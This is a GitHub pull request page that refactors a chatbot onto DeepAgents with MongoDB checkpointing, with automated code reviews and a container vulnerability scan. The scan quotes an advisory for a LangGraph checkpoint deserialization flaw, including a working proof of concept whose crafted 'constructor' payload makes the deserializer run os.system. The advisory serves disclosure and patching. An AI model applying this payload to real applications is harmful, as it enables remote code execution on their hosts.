
Conversation

@MH0386 MH0386 commented Oct 20, 2025

Refactor the application by moving GUI components, improving memory handling, and updating error handling. Enhance Docker and CI configurations, streamline logging, and integrate new dependencies. Address style issues and improve overall code organization for better maintainability.

Summary by Sourcery

Refactor the core application to leverage the DeepAgents multi-agent system and simplify the existing state graph, memory handling, and model setup.

New Features:

  • Integrate DeepAgents framework with AsyncMongoDBSaver checkpointer for long-term memory

Enhancements:

  • Replace custom StateGraph, memory retrieval/updating, and memory setup methods with a unified DeepAgents-based flow
  • Simplify model initialization using init_chat_model and streamline prompt generation in non-speaker mode
  • Update generate_response and draw_graph to operate on the new deep_agent instance
  • Improve error handling and add explicit type checks during prompt creation

Build:

  • Refresh dependencies by adding deepagents, langchain[google-genai], langgraph-checkpoint-mongodb, and pymongo, and removing obsolete langchain-community, langchain-openai, and langgraph entries

gitnotebooks bot commented Oct 20, 2025

sourcery-ai bot commented Oct 20, 2025

Reviewer's Guide

This PR refactors the application to replace the custom state graph, memory, and LLM setup with the DeepAgents multi-agent framework, streamlines prompt and model initialization, and updates dependencies and GUI rendering for improved maintainability.

Sequence diagram for response generation with DeepAgents

sequenceDiagram
    participant User
    participant App
    participant DeepAgents
    participant MongoDB
    User->>App: Send message
    App->>DeepAgents: Start agent stream (with message)
    DeepAgents->>MongoDB: Checkpoint state
    DeepAgents-->>App: Stream response
    App-->>User: Display response
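The streaming flow above can be sketched as an async consumer loop. `FakeDeepAgent` below is a stand-in stub (the real compiled graph comes from `create_deep_agent` and is checkpointed in MongoDB), and the message shapes are illustrative, not the project's actual `State` type:

```python
import asyncio

# Stand-in for the compiled DeepAgents graph; the real object would come
# from create_deep_agent(...) with an AsyncMongoDBSaver checkpointer.
class FakeDeepAgent:
    async def astream(self, state, config):
        # Each yielded chunk mimics a node update carrying messages.
        for text in ["Hello", " world"]:
            yield {"messages": [{"role": "ai", "content": text}]}

async def generate_response(agent, message: str) -> str:
    parts = []
    async for chunk in agent.astream(
        {"messages": [{"role": "user", "content": message}]},
        {"configurable": {"thread_id": "demo"}},
    ):
        for msg in chunk["messages"]:
            if msg["role"] == "ai":
                parts.append(msg["content"])
    return "".join(parts)

print(asyncio.run(generate_response(FakeDeepAgent(), "hi")))  # → Hello world
```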

Class diagram for refactored App structure using DeepAgents

classDiagram
class App {
  Settings settings
  AsyncMongoDBSaver _checkpointer
  CompiledStateGraph _deep_agent
  list~BaseTool~ _tools
  +async create(settings: Settings) App
  +_setup_deepagents() CompiledStateGraph
  +_setup_prompt() str
  +_setup_model() BaseChatModel
  +draw_graph() Path
  +gui() Blocks
  +async generate_response(message: str) AIMessage
}
App --> AsyncMongoDBSaver : uses as checkpointer
App --> CompiledStateGraph : uses as deep_agent
App --> BaseTool : uses tools
App --> Settings : has settings

class AsyncMongoDBSaver
class CompiledStateGraph
class BaseTool
class Settings
class BaseChatModel
class Blocks
class AIMessage

File-Level Changes

Change: DeepAgents integration replaces legacy graph and memory logic
  • Removed _setup_graph, _retrieve_memory, and _update_memory methods
  • Added AsyncMongoDBSaver checkpointer and _setup_deepagents invoking create_deep_agent
  • Updated draw_graph and generate_response to use the new _deep_agent
  Files: src/chattr/app/builder.py

Change: Model and prompt initialization overhauled
  • Switched model init from ChatOpenAI to init_chat_model with Google GenAI
  • Refactored _setup_prompt to return a simple string, enforcing StringPromptValue
  • Removed speaker_mode and simplified prompt formatting
  Files: src/chattr/app/builder.py

Change: Dependency and GUI updates
  • Added deepagents, langchain[google-genai,openai], langgraph-checkpoint-mongodb, pymongo
  • Removed langchain-community, langchain-openai, langgraph
  • Adjusted GUI Markdown display to render the prompt string directly
  Files: pyproject.toml, src/chattr/app/builder.py

Tips and commands

Interacting with Sourcery

  • Trigger a new review: Comment @sourcery-ai review on the pull request.
  • Continue discussions: Reply directly to Sourcery's review comments.
  • Generate a GitHub issue from a review comment: Ask Sourcery to create an
    issue from a review comment by replying to it. You can also reply to a
    review comment with @sourcery-ai issue to create an issue from it.
  • Generate a pull request title: Write @sourcery-ai anywhere in the pull
    request title to generate a title at any time. You can also comment
    @sourcery-ai title on the pull request to (re-)generate the title at any time.
  • Generate a pull request summary: Write @sourcery-ai summary anywhere in
    the pull request body to generate a PR summary at any time exactly where you
    want it. You can also comment @sourcery-ai summary on the pull request to
    (re-)generate the summary at any time.
  • Generate reviewer's guide: Comment @sourcery-ai guide on the pull
    request to (re-)generate the reviewer's guide at any time.
  • Resolve all Sourcery comments: Comment @sourcery-ai resolve on the
    pull request to resolve all Sourcery comments. Useful if you've already
    addressed all the comments and don't want to see them anymore.
  • Dismiss all Sourcery reviews: Comment @sourcery-ai dismiss on the pull
    request to dismiss all existing Sourcery reviews. Especially useful if you
    want to start fresh with a new review - don't forget to comment
    @sourcery-ai review to trigger a new review!

Customizing Your Experience

Access your dashboard to:

  • Enable or disable review features such as the Sourcery-generated pull request
    summary, the reviewer's guide, and others.
  • Change the review language.
  • Add, remove or edit custom review instructions.
  • Adjust other review settings.

Getting Help

coderabbitai bot commented Oct 20, 2025

Important

Review skipped

Auto reviews are disabled on base/target branches other than the default branch.

Please check the settings in the CodeRabbit UI or the .coderabbit.yaml file in this repository. To trigger a single review, invoke the @coderabbitai review command.

You can disable this status message by setting the reviews.review_status to false in the CodeRabbit configuration file.

Note

Other AI code review bot(s) detected

CodeRabbit has detected other AI code review bot(s) in this pull request and will avoid duplicating their findings in the review comments. This may lead to a less comprehensive review.

✨ Finishing touches
🧪 Generate unit tests (beta)
  • Create PR with unit tests
  • Post copyable unit tests in a comment
  • Commit unit tests in branch try-deepagents

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

Comment @coderabbitai help to get the list of available commands and usage tips.

@gemini-code-assist
Summary of Changes

Hello @MH0386, I'm Gemini Code Assist¹! I'm currently reviewing this pull request and will post my feedback shortly. In the meantime, here's a summary to help you and other reviewers quickly get up to speed!

This pull request introduces a significant refactoring of the application's underlying architecture by adopting LangGraph DeepAgents. This change aims to simplify the multi-agent system's design, improve memory management, and streamline the integration of language models and tools. The refactor involves updating dependencies, modifying core application logic for agent and prompt setup, and enhancing overall code organization for better maintainability.

Highlights

  • Core Architecture Refactor: The application's core structure has been refactored to integrate LangGraph DeepAgents, replacing the previous custom LangGraph state machine and mem0 memory management system. This streamlines agent orchestration and memory handling.
  • Dependency Updates: New dependencies deepagents, langchain[google-genai,openai], langgraph-checkpoint-mongodb, and pymongo have been added. Correspondingly, older langchain-community, langchain-openai, and standalone langgraph packages, along with mem0 related libraries, have been removed.
  • Simplified Prompt Handling: The prompt template (template.poml) has been updated to remove the explicit {{context}} variable, as DeepAgents now manages contextual memory internally. The _setup_prompt method reflects this change, returning a simple string prompt.
  • LLM Integration Change: The language model initialization has shifted from a custom ChatOpenAI setup to using init_chat_model with gemini-2.5-flash and google_genai provider, simplifying model configuration.
  • Memory Management: Memory persistence is now handled by AsyncMongoDBSaver as part of the DeepAgents integration, eliminating the need for the standalone mem0 library and its associated configurations.
Using Gemini Code Assist

The full guide for Gemini Code Assist can be found on our documentation page, here are some quick tips.

Invoking Gemini

You can request assistance from Gemini at any point by creating a comment using either /gemini <command> or @gemini-code-assist <command>. Below is a summary of the supported commands on the current page.

Feature              | Command             | Description
Code Review          | /gemini review      | Performs a code review for the current pull request in its current state.
Pull Request Summary | /gemini summary     | Provides a summary of the current pull request in its current state.
Comment              | @gemini-code-assist | Responds in comments when explicitly tagged, both in pull request comments and review comments.
Help                 | /gemini help        | Displays a list of available commands.

Customization

To customize Gemini Code Assist for GitHub experience, repository maintainers can create a configuration file and/or provide a custom code review style guide (such as PEP-8 for Python) by creating and adding files to a .gemini/ folder in the base of the repository. Detailed instructions can be found here.

Limitations & Feedback

Gemini Code Assist may make mistakes. Please leave feedback on any instances where its feedback is incorrect or counter productive. You can react with 👍 and 👎 on @gemini-code-assist comments. If you're interested in giving your feedback about your experience with Gemini Code Assist for Github and other Google products, sign up here.

You can also get AI-powered code generation, chat, as well as code reviews directly in the IDE at no cost with the Gemini Code Assist IDE Extension.

Footnotes

  1. Review the Privacy Notices, Generative AI Prohibited Use Policy, Terms of Service, and learn how to configure Gemini Code Assist in GitHub here. Gemini can make mistakes, so double check it and use code with caution.

deepsource-io bot commented Oct 20, 2025

Here's the code health analysis summary for commits 1743ce2..a4c374b. View details on DeepSource ↗.

Analysis Summary

Analyzer | Status     | Summary                                                | Link
Shell    | ✅ Success |                                                        | View Check ↗
Python   | ❌ Failure | ❗ 2 occurrences introduced, 🎯 9 occurrences resolved | View Check ↗
Docker   | ✅ Success |                                                        | View Check ↗
Secrets  | ✅ Success |                                                        | View Check ↗

💡 If you’re a repository administrator, you can configure the quality gates from the settings.

@sourcery-ai sourcery-ai bot left a comment


Hey there - I've reviewed your changes and they look great!

Prompt for AI Agents
Please address the comments from this code review:

## Individual Comments

### Comment 1
<location> `src/chattr/app/builder.py:74` </location>
<code_context>
-        cls._model = cls._llm.bind_tools(cls._tools, parallel_tool_calls=False)
-        cls._memory = await cls._setup_memory()
-        cls._graph = cls._setup_graph()
+        cls._checkpointer = AsyncMongoDBSaver.from_conn_string("localhost:27017")
+        cls._deep_agent = cls._setup_deepagents()
         return cls()
</code_context>

<issue_to_address>
**suggestion:** Hardcoded MongoDB connection string may reduce deployment flexibility.

Consider sourcing the connection string from configuration or environment variables to support multiple deployment environments.

```suggestion
        import os
        mongo_conn_string = os.environ.get("MONGODB_CONN_STRING", "mongodb://localhost:27017")
        cls._checkpointer = AsyncMongoDBSaver.from_conn_string(mongo_conn_string)
```
</issue_to_address>

### Comment 2
<location> `src/chattr/app/builder.py:116` </location>
<code_context>
-                api_key=cls.settings.model.api_key,
-                temperature=cls.settings.model.temperature,
-            )
+            return init_chat_model("gemini-2.5-flash", model_provider="google_genai")
         except Exception as e:
             _msg = f"Failed to initialize ChatOpenAI model: {e}"
</code_context>

<issue_to_address>
**suggestion:** Model initialization is now hardcoded to Gemini; consider configurability.

Making the model and provider configurable will allow easier support for future changes or additional options.

Suggested implementation:

```python
        try:
            return init_chat_model(
                cls.settings.model.name,
                model_provider=cls.settings.model.provider
            )
        except Exception as e:
            _msg = f"Failed to initialize ChatOpenAI model: {e}"
            logger.error(_msg)
            raise Error(_msg) from e

```

Ensure that `cls.settings.model` has the attributes `name` and `provider` set appropriately, either via configuration files or environment variables. If these attributes do not exist, you will need to add them to your model settings class and update any configuration logic accordingly.
</issue_to_address>

Sourcery is free for open source - if you like our reviews please consider sharing them ✨
Help me be more useful! Please click 👍 or 👎 on each comment and I'll use the feedback to improve your reviews.

mergify bot commented Oct 20, 2025

🧪 CI Insights

Here's what we observed from your CI run for a4c374b.

🟢 All jobs passed!

But CI Insights is watching 👀

socket-security bot commented Oct 20, 2025

@gemini-code-assist gemini-code-assist bot left a comment


Code Review

This pull request successfully refactors the application to use DeepAgents, which simplifies the overall architecture. However, the refactoring has introduced several critical regressions by hardcoding values for the database connection, model configuration, and conversation thread_id. These hardcoded values remove configurability and, in the case of thread_id, will cause all users to share a single conversation state. These issues must be addressed before merging.

api_key=cls.settings.model.api_key,
temperature=cls.settings.model.temperature,
)
return init_chat_model("gemini-2.5-flash", model_provider="google_genai")

critical

The chat model is hardcoded to use gemini-2.5-flash with the google_genai provider. This bypasses the ModelSettings configuration, removing the flexibility to switch models. This functionality should be restored by using the values from cls.settings.model. You may need to update ModelSettings to include a provider field.

last_agent_message: AIMessage | None = None
async for response in cls._deep_agent.astream(
State(messages=[HumanMessage(content=message)], mem0_user_id="1"),
RunnableConfig(configurable={"thread_id": "1"}),

critical

The thread_id is hardcoded to "1". This is a critical flaw that will cause all users to share the same conversation history, as the checkpointer uses this ID to save and load state. Each conversation requires a unique thread_id. This should be implemented using a session management mechanism, such as Gradio's gr.State, to assign and track a unique ID for each user session.
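A minimal sketch of per-session thread assignment, using uuid for the IDs and a plain dict standing in for gr.State (the function name and session keys here are illustrative, not the project's API):

```python
import uuid

# Stand-in for per-session storage; in a Gradio app this value would be
# held in gr.State rather than a module-level dict.
_session_threads: dict[str, str] = {}

def thread_id_for(session_key: str) -> str:
    # Lazily assign each session its own UUID so no two conversations
    # share checkpointer state.
    return _session_threads.setdefault(session_key, str(uuid.uuid4()))

a = thread_id_for("session-a")
b = thread_id_for("session-b")
print(a != b)                           # → True (distinct sessions, distinct threads)
print(thread_id_for("session-a") == a)  # → True (stable within a session)
```

The resulting ID would then be passed as `{"configurable": {"thread_id": ...}}` instead of the hardcoded "1".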

cls._model = cls._llm.bind_tools(cls._tools, parallel_tool_calls=False)
cls._memory = await cls._setup_memory()
cls._graph = cls._setup_graph()
cls._checkpointer = AsyncMongoDBSaver.from_conn_string("localhost:27017")

high

The MongoDB connection string is hardcoded. This prevents configuration for different environments (e.g., development vs. production). This value should be moved to the Settings object in src/chattr/app/settings.py to allow for proper configuration.
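A minimal sketch of sourcing the connection string from the environment, using a stdlib dataclass in place of the project's actual Settings class (the MONGODB_URL variable name and the field name are assumptions):

```python
import os
from dataclasses import dataclass, field

def _mongo_url_from_env() -> str:
    # MONGODB_URL is a hypothetical variable name; align it with your
    # deployment conventions.
    return os.environ.get("MONGODB_URL", "mongodb://localhost:27017")

@dataclass
class DatabaseSettings:
    # Falls back to the local default when the variable is unset.
    url: str = field(default_factory=_mongo_url_from_env)

settings = DatabaseSettings()
print(settings.url.startswith("mongodb://"))
```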

)
return init_chat_model("gemini-2.5-flash", model_provider="google_genai")
except Exception as e:
_msg = f"Failed to initialize ChatOpenAI model: {e}"

medium

The error message refers to ChatOpenAI, but the code now initializes a different model. The message should be updated to be more generic to avoid confusion during debugging.

Suggested change
_msg = f"Failed to initialize ChatOpenAI model: {e}"
_msg = f"Failed to initialize chat model: {e}"

async for response in cls._graph.astream(
last_agent_message: AIMessage | None = None
async for response in cls._deep_agent.astream(
State(messages=[HumanMessage(content=message)], mem0_user_id="1"),

medium

The mem0_user_id parameter appears to be a remnant from the previous mem0 implementation. With DeepAgents using thread_id for session management, this parameter is likely unused. It should be removed from the State class definition and this call to improve clarity and remove dead code.

Suggested change
State(messages=[HumanMessage(content=message)], mem0_user_id="1"),
State(messages=[HumanMessage(content=message)]),

MH0386 commented Oct 20, 2025

🔍 Vulnerabilities of ghcr.io/alphaspheredotai/chattr:0ff786c-pr-423

📦 Image Reference: ghcr.io/alphaspheredotai/chattr:0ff786c-pr-423
Digest: sha256:b71ded86335e6e5e6385a3edbaa561acabe6efacf84a1dc22f1abb40d43b7b7a
Vulnerabilities: critical: 0, high: 3, medium: 0, low: 0
Platform: linux/amd64
Size: 328 MB
Packages: 521
critical: 0 high: 1 medium: 0 low: 0 langgraph-checkpoint 2.1.2 (pypi)

pkg:pypi/[email protected]

# Dockerfile (28:28)
COPY --from=builder --chown=nonroot:nonroot --chmod=555 /home/nonroot/.local/ /home/nonroot/.local/

high 7.4: CVE-2025-64439 Deserialization of Untrusted Data

Affected range: <3.0.0
Fixed version: 3.0.0
CVSS Score: 7.4
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:H
Description

Summary

Prior to langgraph-checkpoint version 3.0, LangGraph’s JsonPlusSerializer (used as the default serialization protocol for all checkpointing) contains a remote code execution (RCE) vulnerability when deserializing payloads saved in the "json" serialization mode.

If an attacker can cause your application to persist a payload serialized in this mode, they may be able to also send malicious content that executes arbitrary Python code during deserialization.

Upgrading to version langgraph-checkpoint 3.0 patches this vulnerability by preventing deserialization of custom objects saved in this mode.

If you are deploying in langgraph-api, any version 0.5 or later is also free of this vulnerability.

Details

Affected file / component

jsonplus.py

By default, the serializer attempts to use "msgpack" for serialization. However, prior to version 3.0 of the checkpointer library, if illegal Unicode surrogate values caused serialization to fail, it would fall back to using the "json" mode.

When operating in this mode, the deserializer supports a constructor-style format (lc == 2, type == "constructor") for custom objects to allow them to be reconstructed at load time. If an attacker is able to trigger this mode with a malicious payload, deserializing it allows the attacker to execute arbitrary functions upon load.


Who is affected

This issue affects all users of langgraph-checkpoint versions earlier than 3.0 who:

  1. Allow untrusted or user-supplied data to be persisted into checkpoints, and
  2. Use the default serializer (or explicitly instantiate JsonPlusSerializer) that may fall back to "json" mode.

If your application only processes trusted data or does not allow untrusted checkpoint writes, the practical risk is reduced.

Proof of Concept (PoC)

from typing import TypedDict

from langgraph.checkpoint.sqlite import SqliteSaver
from langgraph.graph import StateGraph


class State(TypedDict):
    foo: str
    attack: dict


def my_node(state: State):
    return {"foo": "oops i fetched a surrogate \ud800"}


with SqliteSaver.from_conn_string("foo.db") as saver:
    graph = (
        StateGraph(State)
        .add_node("my_node", my_node)
        .add_edge("__start__", "my_node")
        .compile(checkpointer=saver)
    )

    attack = {
        "lc": 2,
        "type": "constructor",
        "id": ["os", "system"],
        "kwargs": {"command": "echo pwnd you > /tmp/pwnd.txt"},
    }
    malicious_payload = {"attack": attack}

    thread_id = "00000000-0000-0000-0000-000000000001"
    config = {"thread_id": thread_id}
    # Malicious payload is saved in the first call
    graph.invoke(malicious_payload, config=config)

    # Malicious payload is deserialized and code is executed in the second call
    graph.invoke({"foo": "hi there"}, config=config)

Running this PoC writes a file /tmp/pwnd.txt to disk, demonstrating code execution.

Internally, this exploits the following code path:

from langgraph.checkpoint.serde.jsonplus import JsonPlusSerializer

serializer = JsonPlusSerializer() # Used within the checkpointer

serialized = serializer.dumps_typed(malicious_payload)
serializer.loads_typed(serialized)  # Executes os.system(...)

Fixed Version

The vulnerability is fixed in langgraph-checkpoint==3.0.0

Release link: https://github.com/langchain-ai/langgraph/releases/tag/checkpoint%3D%3D3.0.0


Fix Description

The fix introduces an allow-list for constructor deserialization, restricting permissible "id" paths to explicitly approved module/class combinations provided at serializer construction.

Additionally, saving payloads in "json" format has been deprecated to remove this unsafe fallback path.
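The allow-list pattern can be illustrated generically. This is not the actual langgraph-checkpoint implementation, only a sketch of restricting permissible constructor "id" paths; the approved entries here are arbitrary examples:

```python
# Hypothetical allow-list: only these module/attribute paths may be
# reconstructed from a "constructor"-style payload.
ALLOWED_CONSTRUCTORS = {("uuid", "UUID"), ("collections", "OrderedDict")}

def constructor_allowed(payload: dict) -> bool:
    # Reject any "id" path that is not explicitly approved, such as
    # ["os", "system"] from the PoC above.
    return tuple(payload.get("id", ())) in ALLOWED_CONSTRUCTORS

print(constructor_allowed({"lc": 2, "type": "constructor", "id": ["os", "system"]}))  # → False
print(constructor_allowed({"lc": 2, "type": "constructor", "id": ["uuid", "UUID"]}))  # → True
```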


Mitigation

Upgrade immediately to langgraph-checkpoint==3.0.0.

This version is fully compatible with langgraph>=0.3 and does not require any import changes or code modifications.

In langgraph-api, updating to 0.5 or later will automatically require the patched version of the checkpointer library.

critical: 0 high: 1 medium: 0 low: 0 pdfjs-dist 3.11.174 (npm)

pkg:npm/[email protected]

# Dockerfile (28:28)
COPY --from=builder --chown=nonroot:nonroot --chmod=555 /home/nonroot/.local/ /home/nonroot/.local/

high 8.8: CVE-2024-4367 Improper Check for Unusual or Exceptional Conditions

Affected range: <=4.1.392
Fixed version: 4.2.67
CVSS Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score: 37.168%
EPSS Percentile: 97th percentile
Description

Impact

If pdf.js is used to load a malicious PDF, and PDF.js is configured with isEvalSupported set to true (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain.

Patches

The patch removes the use of eval:
mozilla/pdf.js#18015

Workarounds

Set the option isEvalSupported to false.

References

https://bugzilla.mozilla.org/show_bug.cgi?id=1893645

critical: 0 high: 1 medium: 0 low: 0 gradio 5.49.1 (pypi)

pkg:pypi/[email protected]

# Dockerfile (28:28)
COPY --from=builder --chown=nonroot:nonroot --chmod=555 /home/nonroot/.local/ /home/nonroot/.local/

high 8.1: CVE-2023-6572 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

Affected range: <2023-11-06
Fixed version: Not Fixed
CVSS Score: 8.1
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
EPSS Score: 1.662%
EPSS Percentile: 81st percentile
Description

Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository gradio-app/gradio prior to main.

@mergify mergify bot temporarily deployed to code_quality November 6, 2025 11:07 Inactive
sonarqubecloud bot commented Nov 6, 2025
